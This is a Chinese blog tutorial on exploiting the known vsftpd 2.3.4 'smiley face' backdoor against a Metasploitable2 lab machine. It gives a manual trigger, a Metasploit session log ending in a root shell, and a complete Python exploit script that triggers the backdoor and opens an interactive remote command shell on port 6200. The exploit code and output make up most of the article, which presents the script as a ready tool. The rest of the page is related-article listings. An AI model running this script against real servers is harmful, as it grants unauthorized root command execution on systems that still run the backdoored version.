vsftpd2.3.4 后门利用脚本编写

最新推荐文章于 2024-05-10 22:24:53 发布
最新推荐文章于 2024-05-10 22:24:53 发布
阅读量1.1k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjq18827615690/article/details/113462288
版权
本文详细介绍了如何利用Vsftpd2.3.4版本的一个后门进行攻击,包括手动和通过MSF(Metasploit Framework)进行利用。还提供了一个Python脚本来自动化这个过程,该脚本能检测目标是否易受攻击,并在成功后开启交互式shell。
摘要由CSDN通过智能技术生成

安全开发-Vsftpd2.3.4后门利用脚本编写

来自法老的博客

 Python专题

Created At : 2021-01-29 16:59

Views 👀 :15

一:漏洞起源

 

二:手动利用

靶场环境

定位环境IP Address
攻击机Python3.8192.168.31.33
靶机Metasploitable2192.168.31.20

步骤一:FTP登录

使用用户名+:)来进行用户登录,密码随便填写,连接上后会开启后门侦听6200端口来等待命令连接

 

步骤二:Python脚本发送命令

import socket                  #导入socket库
ip = "192.168.31.33"           
port = 6200
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, 6200))         #对目标建立socket连接
s.settimeout(1.5)     
host = str.encode('id -u -n' + '\n')  #执行id命令查询当前用户身份信息
s.send(host)                          #发送命令
hostt = s.recv(1024).decode('utf-8')  #接受命令
print(hostt)                          #打印命令执行结果

python复制代码

 

三:MSF攻击

msf6 > search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.31.33
RHOSTS => 192.168.31.33
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.31.33:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.31.33:21 - USER: 331 Please specify the password.
[+] 192.168.31.33:21 - Backdoor service has been spawned, handling...
[+] 192.168.31.33:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.31.33:6200) at 2021-01-29 17:28:46 +0800
whoami
root

xaml复制代码

四:攻击脚本编写

import socket    #网络编程    
import time      #处理时间
import sys       #接受参数   

def exploit(ip, port):
    try:
        ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
        ftp.connect((ip, port))                 #对目标IP地址及端口进行连接
        check = ftp.recv(1024).decode('utf-8')  #接受返回来的数据并对其进行解码操作
        socket.setdefaulttimeout(5)             #设置请求超时时间
        if "vsftpd 2.3.4" in check.lower():     #检测banner信息中是否存在漏洞信息
            ftp.send(b'USER letmein:)\n')       #发送攻击数据,记住笑脸
            ftp.send(b'PASS invaild\n')         #发送攻击数据
            time.sleep(2)                       #等待2秒钟时间
            ftp.close()                         #关闭连接
            print("[+] SUCCESSFUL CONNECTİON")
        else:
            print("[-] Not work vsftpd 2.3.4")
    except Exception as f:                      #异常信息给到变量f
        print('[-] CONNECTION FAILED')
        print(f)                                #打印异常信息
        ftp.close()                             #关闭连接
        sys.exit(1)                             #退出程序并返回1

    try:
        arkakapi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)     #调用socket库
        arkakapi.connect((ip, 6200))                                     #对目标IP地址及端口进行连接
        arkakapi.setdefaulttimeout(1.5)                                  #设置请求超时时间为1.5秒
        print('[*] SESSION CREATED')  
        print('[!] Interactive shell to check >> use command shell_check')
        host = str.encode('id -u -n' + '\n')                             #漏洞验证                           
        arkakapi.send(host)                                              #发送命令
        hostt = arkakapi.recv(1024).decode('utf-8')                      #打印输出当前用户信息
        while True:
            sendnude = input(ip + '@' + str(hostt.strip()) + "#: ")      #接受用户输入要执行的命令
            if sendnude.lower() == 'shell_check':                        #shell终端检测
                print('[*]Interactıve shell checked...')
                komut = str.encode((tty + '\n'))
                arkakapi.send(komut)
                print(arkakapi.recv(1024).decode('utf-8'))
            else:
                try:
                    komut = str.encode((sendnude + '\n'))              #将输入的命令添加换行操作在进行UTF-8编码
                    arkakapi.send(komut)                               #发送要执行的命令
                    responseq = arkakapi.recv(1024).decode('utf-8')    #接受并解码放回来的数据
                    print(responseq)                                   #打印命令执行结果
                except socket.timeout:
                    pass

            if sendnude.lower() == 'exit':                             #shell中判断退出
                print('[*] SESSION CLOSED')
                arkakapi.close()
                sys.exit(1)
    except Exception as f:                                             #异常处理
        print('[!] Failed to connect to backdoor')
        print(f)

if __name__ == '__main__':     # 判断python脚本是否是独立执行
    if len(sys.argv) < 3:      # 脚本参数数量判断
        print('Usage ./VSFTPexp.py <İP> <PORT>')
        print('Example ./VSFTPexp.py 127.0.0.1 21')    
    else:
        exploit(sys.argv[1], int(sys.argv[2]))   #函数使用  第一个参数传递进入字符串类型  第二个参数传递进入为类型转换后的整型

python复制代码

执行结果

 

马冬梅007
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vsftpd (附脚本
Ray19940106的博客
07-01 355
vsftpd 是"very secure FTP daemon"的缩写,安全性是它的一个最大的特点。vsftpd 是一个 UNIX 类操作系统上运行的服务器的名字,它可以运行在诸如 Linux、BSD、Solaris、 HP-UNIX等系统上面,是一个完全免费的、开放源代码的ftp服务器软件,支持很多其他的 FTP 服务器所不支持的特征。比如:非常高的安全性需求、带宽限制、良好的可伸缩性、可创建虚拟用户、支持IPv6、速率高等。vsftpd是软件的名字 是一个ftp服务 运行在应用层的服务。
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7200
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
Vsftpd后门
qq_54713392的博客
05-09 700
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9285
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
vsftpd一键安装脚本
07-26 2381
脚本我线上环境一键安装脚本,可以直接在Centos服务器上一键安装vsftpd服务并开通ftp账户。此脚本只供本人线上使用,放到此博文方便自己查阅。网友切不可直接复制到自己的线上直接套用,使用前一定要多测试。如有套用使用造成损失,与本博主无关。 #/bin/bash ###脚本使用说明 #bash 脚本名称 ftp账户 ftp密码 虚拟用户 #sh -x insta...
vsftpd的配置脚本
Empty_city_dreams的博客
09-14 636
#!/bin/bash LUJING=&quot;/etc/vsftpd/vsftpd_login&quot; LUJING2=&quot;/etc/pam.d/vsftpd.vu&quot; echo ====================================================== read -p &quot;请输入ftp用户:&quot; ftp_user if [ `echo ${#ftp_user}` -eq 0 ];t..
vsftpd 2.3.4 带漏洞版本 可复现
09-26
在分析或研究此漏洞的过程中,"vsftpd-2.3.4-infected"这个文件可能是包含了被该漏洞影响的vsftpd服务的复现环境或者漏洞利用脚本。这样的资源对于安全研究人员理解漏洞机制、开发检测工具和构建防御策略非常有价值...
Python学习之重构vsFTPd后门漏洞详解
qq_32506555的博客
01-18 898
大家好,首先来个声明本文目的不在于分析vsFTPd后门漏洞,我最近喜欢用漏洞编写exploit的形式来练习编程语言,在本文中,我们将重新用Python语言来一步步的编写这个漏洞的利用程序,主要是触发后门然后连接shell。首先我们来了解一下这个漏洞是如何触发的。   0×02 剖析vsFTPd后门漏洞   这个漏洞比较老了,但是要当成一个例子来练习技术,非常的经典,洞如其名,不知道这个
vsftpd漏洞利用
09-03
- *1* *3* [Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞)](https://blog.csdn.net/qq_34914659/article/details/119534938)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
kali metasploit 漏洞利用
qq_51685718的博客
10-28 677
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。传递通过 MS-RPC 提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在 smb.conf 中,导致允许远程命令执行。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名。
linux vsftpd 一键配置、用户权限配置脚本
11-23
该FTP是配置在linux环境上的vsftpd,可以为FTP用户制定任意主目录,分配任意权限,很灵活、方便,有说明ReadMe.txt 首先 确认 linux 系统的 selinux 和防火墙,这些自己百度修改吧。 包含: 一键初始化配置vsftpd ./ftp_onekeyconfig.sh 增加ftp用户脚本 ./adduser_ftp.sh ftpuser passwd 删除ftp用户脚本 ./deluser_ftp.sh ftpuser 可以自由制定用户的目录、权限
网络安全中职组ftp2.3.4脚本vsftpd2.3.4.py
11-19
网络安全中职组ftp2.3.4脚本vsftpd2.3.4.py
一键脚本自动化安装vsftpd
01-07
可实现在Linux下一键脚本自动化安装vsftpd,可以配合Ansible实现远程装机~
AWD比赛后门通用脚本
10-31
AWD比赛后门通用脚本 改一下IP和密码就好 适用于AWD混战
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
最新发布
m0_62670778的博客
05-10 1122
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
vsftpd后门 Compromised Source Packages Backdoor Vulnerability复现
weixin_69925635的博客
07-17 285
靶机:Metasploittable ip:192.168.204.130。set RHOST 192.168.204.130将靶机设为攻击目标。在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞。show options查看对靶机的攻击方式(设置参数)search vsftpd查找vsftpd漏洞。首先在kali中启动msfconsole。进入靶机的root权限,完成后门。攻击机:kali linux。
FTP服务后门利用 - vsftpd_234_backdoor(笑脸漏洞)
星虐
02-03 3030
vsftpd_234_backdoor(笑脸漏洞) 攻击机和受害机的IP kali: 192.168.75.130 Metasploitable2 - Linux: 192.168.75.128 方法一: 1.测试其流通性 2. 扫描受害机的服务信息 3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意 注意(在输入密码回车后会有停顿,记住不要关闭ftp连接) 4. 此时扫描到受害机会反弹一个6200端口 5.使用 nc 连接会发现是root权限 笑脸漏洞利用成功.
Linux中vsftpd脚本详注
Y缘W分的博客
04-13 455
文件地址:/etc/init.d/vsftpd #!/bin/bash # ### BEGIN INIT INFO # Provides: vsftpd # Required-Start: $local_fs $network $named $remote_fs $syslog # Required-Stop: $local_fs $network $named $remote_fs $sysl
Vsftpd2.3.4后门利用脚本编写
gugonggugong的博客
01-31 583
一、漏洞介绍 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 二、漏洞复现 Linux源代码安装Vsftpd2.3.4: wgethttp://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz #下载安装包 tarzxvf...
vsftpd2.3.4下载
09-29
要下载vsftpd2.3.4,您可以按照以下步骤进行操作: 1. 打开您喜欢的网络浏览器,如Chrome,Firefox等。 2. 在搜索引擎中搜索“vsftpd2.3.4下载”,您将找到一些包含下载信息的网站。 3. 点击其中一个可靠的网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值